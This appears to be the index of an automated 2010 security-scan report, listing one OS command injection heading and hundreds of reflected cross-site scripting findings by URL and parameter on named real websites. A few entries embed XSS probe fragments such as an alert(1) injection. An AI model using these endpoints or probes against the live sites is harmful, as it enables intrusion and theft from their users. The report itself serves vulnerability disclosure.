Report generated by XSS.CX at Sun Nov 14 22:14:00 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


1. OS command injection

2. Cross-site scripting (reflected)

2.1. http://66.70.86.62/feed.gbmap [i parameter]

2.2. http://66.70.86.62/feed.gbmap [k parameter]

2.3. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 1]

2.4. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 2]

2.5. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]

2.6. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [REST URL parameter 1]

2.7. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [REST URL parameter 2]

2.8. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [name of an arbitrarily supplied request parameter]

2.9. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 1]

2.10. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 2]

2.11. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]

2.12. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [REST URL parameter 1]

2.13. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [REST URL parameter 2]

2.14. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [name of an arbitrarily supplied request parameter]

2.15. http://accounting.careerbuilder.com/ [lr parameter]

2.16. http://accounting.careerbuilder.com/ag.ic/Florida/ [lr parameter]

2.17. http://accounting.careerbuilder.com/ag.ic/Florida/ [lr parameter]

2.18. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [REST URL parameter 2]

2.19. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [lr parameter]

2.20. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [lr parameter]

2.21. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [lr parameter]

2.22. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [lr parameter]

2.23. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [lr parameter]

2.24. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [lr parameter]

2.25. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [lr parameter]

2.26. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [lr parameter]

2.27. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [lr parameter]

2.28. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [lr parameter]

2.29. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [lr parameter]

2.30. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [lr parameter]

2.31. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [lr parameter]

2.32. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [lr parameter]

2.33. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [lr parameter]

2.34. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [lr parameter]

2.35. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [lr parameter]

2.36. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [lr parameter]

2.37. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [lr parameter]

2.38. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [lr parameter]

2.39. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [lr parameter]

2.40. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [lr parameter]

2.41. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [lr parameter]

2.42. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [lr parameter]

2.43. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [lr parameter]

2.44. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [lr parameter]

2.45. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [lr parameter]

2.46. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [lr parameter]

2.47. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [lr parameter]

2.48. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [lr parameter]

2.49. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [lr parameter]

2.50. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [lr parameter]

2.51. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

2.52. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

2.53. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

2.54. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [REST URL parameter 1]

2.55. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]

2.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [target parameter]

2.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [target parameter]

2.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [REST URL parameter 1]

2.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]

2.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [target parameter]

2.61. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [target parameter]

2.62. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [REST URL parameter 1]

2.63. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [name of an arbitrarily supplied request parameter]

2.64. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [target parameter]

2.65. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [target parameter]

2.66. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [REST URL parameter 1]

2.67. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

2.68. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [target parameter]

2.69. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [target parameter]

2.70. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [REST URL parameter 1]

2.71. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

2.72. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [target parameter]

2.73. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [target parameter]

2.74. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [REST URL parameter 1]

2.75. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [name of an arbitrarily supplied request parameter]

2.76. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [target parameter]

2.77. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [target parameter]

2.78. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [REST URL parameter 1]

2.79. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [name of an arbitrarily supplied request parameter]

2.80. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [target parameter]

2.81. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [target parameter]

2.82. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [REST URL parameter 1]

2.83. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [name of an arbitrarily supplied request parameter]

2.84. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [target parameter]

2.85. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [target parameter]

2.86. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [REST URL parameter 1]

2.87. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [name of an arbitrarily supplied request parameter]

2.88. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [target parameter]

2.89. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [target parameter]

2.90. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [REST URL parameter 1]

2.91. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [name of an arbitrarily supplied request parameter]

2.92. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [target parameter]

2.93. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [target parameter]

2.94. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [lr parameter]

2.95. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [lr parameter]

2.96. http://cf.localwireless.com/wireless/signup.cfm [pageid parameter]

2.97. http://contest.herald.com/cirquekoozamiami/standard/ [name of an arbitrarily supplied request parameter]

2.98. http://contest.herald.com/nascar/standard/ [9cec8">2f7e3e1de94 parameter]

2.99. http://contest.herald.com/nascar/standard/ [9cec8">HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter]

2.100. http://contest.herald.com/nascar/standard/ [name of an arbitrarily supplied request parameter]

2.101. http://contest.herald.com/nascar/standard/index.asp [9cec8 parameter]

2.102. http://contest.herald.com/nascar/standard/index.asp [name of an arbitrarily supplied request parameter]

2.103. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [lr parameter]

2.104. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [lr parameter]

2.105. http://df.gasbuddy.com/feed.gbmap [i parameter]

2.106. http://df.gasbuddy.com/feed.gbmap [k parameter]

2.107. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [REST URL parameter 3]

2.108. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [name of an arbitrarily supplied request parameter]

2.109. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [lr parameter]

2.110. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [lr parameter]

2.111. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [lr parameter]

2.112. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [lr parameter]

2.113. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [lr parameter]

2.114. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [lr parameter]

2.115. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [lr parameter]

2.116. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [lr parameter]

2.117. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [lr parameter]

2.118. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [lr parameter]

2.119. http://jobs.careerbuilder.com/ [lr parameter]

2.120. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.121. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.122. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.123. http://jqueryui.com/themeroller/ [bgColorError parameter]

2.124. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.125. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

2.126. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.127. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

2.128. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

2.129. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

2.130. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.131. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.132. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

2.133. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.134. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

2.135. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.136. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

2.137. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

2.138. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.139. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.140. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.141. http://jqueryui.com/themeroller/ [bgTextureError parameter]

2.142. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.143. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

2.144. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.145. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

2.146. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

2.147. http://jqueryui.com/themeroller/ [borderColorActive parameter]

2.148. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.149. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.150. http://jqueryui.com/themeroller/ [borderColorError parameter]

2.151. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.152. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

2.153. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.154. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.155. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

2.156. http://jqueryui.com/themeroller/ [fcActive parameter]

2.157. http://jqueryui.com/themeroller/ [fcContent parameter]

2.158. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.159. http://jqueryui.com/themeroller/ [fcError parameter]

2.160. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.161. http://jqueryui.com/themeroller/ [fcHighlight parameter]

2.162. http://jqueryui.com/themeroller/ [fcHover parameter]

2.163. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.164. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.165. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.166. http://jqueryui.com/themeroller/ [iconColorActive parameter]

2.167. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.168. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.169. http://jqueryui.com/themeroller/ [iconColorError parameter]

2.170. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.171. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

2.172. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.173. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.174. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

2.175. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

2.176. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

2.177. http://jqueryui.com/themeroller/ [opacityShadow parameter]

2.178. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

2.179. http://js.revsci.net/gateway/gw.js [bpid parameter]

2.180. http://js.revsci.net/gateway/gw.js [csid parameter]

2.181. http://kelvinluck.com/assets/jquery/jScrollPane/ [REST URL parameter 3]

2.182. http://kelvinluck.com/assets/jquery/jScrollPane/ [REST URL parameter 3]

2.183. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [lr parameter]

2.184. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [lr parameter]

2.185. http://nl.newsbank.com/nl-search/we/Archives [p_theme parameter]

2.186. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [lr parameter]

2.187. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [lr parameter]

2.188. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

2.189. http://pd.miami.com/sp [aff parameter]

2.190. http://pd.miami.com/sp [keywords parameter]

2.191. http://pd.miami.com/sp [keywords parameter]

2.192. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]

2.193. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]

2.194. http://pd.miami.com/sp [skin parameter]

2.195. http://pd.miami.com/sp [skin parameter]

2.196. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [lr parameter]

2.197. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [lr parameter]

2.198. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [lr parameter]

2.199. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [lr parameter]

2.200. http://search.miami.com/search-bin/search.pl.cgi [fields parameter]

2.201. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

2.202. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

2.203. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

2.204. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

2.205. http://www.careerbuilder.com/ [lr parameter]

2.206. http://www.cars.com/go/advice/Section.jsp [section parameter]

2.207. http://www.cars.com/go/advice/Story.jsp [subject parameter]

2.208. http://www.cars.com/go/advice/Story.jsp [subject parameter]

2.209. http://www.cars.com/go/car-dealers/ck/Miami-FL/ [name of an arbitrarily supplied request parameter]

2.210. http://www.cars.com/go/crp/buyingGuides/Story.jsp [story parameter]

2.211. http://www.cars.com/go/crp/buyingGuides/Story.jsp [subject parameter]

2.212. http://www.cars.com/go/dealersearch/specials.jsp [specialsURL parameter]

2.213. http://www.cars.com/go/includes/targeting/vendors.jsp [makename parameter]

2.214. http://www.cars.com/go/includes/targeting/vendors.jsp [modelname parameter]

2.215. http://www.cars.com/go/includes/targeting/vendors.jsp [my parameter]

2.216. http://www.elnuevoherald.com/reg-bin/int.cgi [version parameter]

2.217. http://www.elnuevoherald.com/reg-bin/tint.cgi [version parameter]

2.218. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

2.219. http://www.miami.com/advanced-search [name of an arbitrarily supplied request parameter]

2.220. http://www.miami.com/deals [name of an arbitrarily supplied request parameter]

2.221. http://www.miami.com/espanol [name of an arbitrarily supplied request parameter]

2.222. http://www.miami.com/galleries [name of an arbitrarily supplied request parameter]

2.223. http://www.miami.com/gay [name of an arbitrarily supplied request parameter]

2.224. http://www.miami.com/hotels [name of an arbitrarily supplied request parameter]

2.225. http://www.miami.com/movies [name of an arbitrarily supplied request parameter]

2.226. http://www.miami.com/movies/ [name of an arbitrarily supplied request parameter]

2.227. http://www.miami.com/nightlife [name of an arbitrarily supplied request parameter]

2.228. http://www.miami.com/restaurants [name of an arbitrarily supplied request parameter]

2.229. http://www.miami.com/see-do [name of an arbitrarily supplied request parameter]

2.230. http://www.miami.com/shopping [name of an arbitrarily supplied request parameter]

2.231. http://www.miamiherald.com/reg-bin/tint.cgi [version parameter]

2.232. http://www.momsmiami.com/ [blog_id parameter]

2.233. http://www.momsmiami.com/ [link_id parameter]

2.234. http://www.momsmiami.com/ [t parameter]

2.235. http://www.momsmiami.com/forum/memberlist.php [blog_id parameter]

2.236. http://www.momsmiami.com/forum/memberlist.php [name of an arbitrarily supplied request parameter]

2.237. http://www.momsmiami.com/forum/memberlist.php [t parameter]

2.238. http://www.momsmiami.com/index.php [t parameter]

2.239. http://www.momsmiami.com/view_photo.php [c parameter]

2.240. http://www.momsmiami.com/view_photo.php [t parameter]

2.241. http://www.paperg.com/jsfb/embed.php [514e9 parameter]

2.242. http://www.paperg.com/jsfb/embed.php [514e9'-alert(1)-'c9c3e793f35 parameter]

2.243. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.244. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.245. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

2.246. http://www.paperg.com/jsfb/embed.php [pid parameter]

2.247. http://www.rentalhomesplus.com/ [name of an arbitrarily supplied request parameter]

2.248. http://www.shoplocal.com/ [name of an arbitrarily supplied request parameter]

2.249. http://www.sportsnetwork.com/aspdata/clients/sportsnetwork/RealScoresClientLive.aspx [client parameter]

2.250. http://yourblogs.miamiherald.com/ [name of an arbitrarily supplied request parameter]

2.251. http://accounting.careerbuilder.com/ [Referer HTTP header]

2.252. http://accounting.careerbuilder.com/ [Referer HTTP header]

2.253. http://accounting.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx [Referer HTTP header]

2.254. http://accounting.careerbuilder.com/ag.ic/Florida/ [Referer HTTP header]

2.255. http://accounting.careerbuilder.com/ag.ic/Florida/ [Referer HTTP header]

2.256. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [Referer HTTP header]

2.257. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [Referer HTTP header]

2.258. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [Referer HTTP header]

2.259. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [Referer HTTP header]

2.260. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/JobResults.aspx [Referer HTTP header]

2.261. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [Referer HTTP header]

2.262. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [Referer HTTP header]

2.263. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [Referer HTTP header]

2.264. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [Referer HTTP header]

2.265. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [Referer HTTP header]

2.266. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [Referer HTTP header]

2.267. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [Referer HTTP header]

2.268. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [Referer HTTP header]

2.269. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [Referer HTTP header]

2.270. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [Referer HTTP header]

2.271. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [Referer HTTP header]

2.272. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [Referer HTTP header]

2.273. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [Referer HTTP header]

2.274. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [Referer HTTP header]

2.275. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [Referer HTTP header]

2.276. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [Referer HTTP header]

2.277. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [Referer HTTP header]

2.278. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [Referer HTTP header]

2.279. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [Referer HTTP header]

2.280. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [Referer HTTP header]

2.281. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [Referer HTTP header]

2.282. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [Referer HTTP header]

2.283. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [Referer HTTP header]

2.284. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [Referer HTTP header]

2.285. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [Referer HTTP header]

2.286. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [Referer HTTP header]

2.287. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [Referer HTTP header]

2.288. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [Referer HTTP header]

2.289. http://api.careerbuilder.com/ [Referer HTTP header]

2.290. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [Referer HTTP header]

2.291. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [Referer HTTP header]

2.292. http://college.careerbuilder.com/co.ic/Florida_Miami/ [Referer HTTP header]

2.293. http://college.careerbuilder.com/co.ic/Florida_Miami/ [Referer HTTP header]

2.294. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [Referer HTTP header]

2.295. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [Referer HTTP header]

2.296. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [Referer HTTP header]

2.297. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [Referer HTTP header]

2.298. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [Referer HTTP header]

2.299. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [Referer HTTP header]

2.300. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [Referer HTTP header]

2.301. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [Referer HTTP header]

2.302. http://healthcare.careerbuilder.com/hc.ic/Florida_Miami/ [Referer HTTP header]

2.303. http://healthcare.careerbuilder.com/hc.ic/Florida_Miami/ [Referer HTTP header]

2.304. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [Referer HTTP header]

2.305. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [Referer HTTP header]

2.306. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [Referer HTTP header]

2.307. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [Referer HTTP header]

2.308. http://jobs.careerbuilder.com/ [Referer HTTP header]

2.309. http://jobs.careerbuilder.com/ [Referer HTTP header]

2.310. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [Referer HTTP header]

2.311. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [Referer HTTP header]

2.312. http://mobile.careerbuilder.com/ [Referer HTTP header]

2.313. http://mobile.careerbuilder.com/ [Referer HTTP header]

2.314. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [Referer HTTP header]

2.315. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [Referer HTTP header]

2.316. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [Referer HTTP header]

2.317. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [Referer HTTP header]

2.318. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [Referer HTTP header]

2.319. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [Referer HTTP header]

2.320. http://www.careerbuilder.be/ [Referer HTTP header]

2.321. http://www.careerbuilder.ca/ [Referer HTTP header]

2.322. http://www.careerbuilder.ch/ [Referer HTTP header]

2.323. http://www.careerbuilder.co.in/ [Referer HTTP header]

2.324. http://www.careerbuilder.co.uk/ [Referer HTTP header]

2.325. http://www.careerbuilder.com/ [Referer HTTP header]

2.326. http://www.careerbuilder.com/ [Referer HTTP header]

2.327. http://www.careerbuilder.com/Default.aspx [Referer HTTP header]

2.328. http://www.careerbuilder.com/Default.aspx [Referer HTTP header]

2.329. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]

2.330. http://www.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx [Referer HTTP header]

2.331. http://www.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx [Referer HTTP header]

2.332. http://www.careerbuilder.com/JobSeeker/Resumes/HourlyResume.aspx [Referer HTTP header]

2.333. http://www.careerbuilder.com/Jobs/Company/CCBCONVXXXXX423122/Miami-Herald-Media-Company/ [Referer HTTP header]

2.334. http://www.careerbuilder.com/PLI/R/AdvSearch.htm [Referer HTTP header]

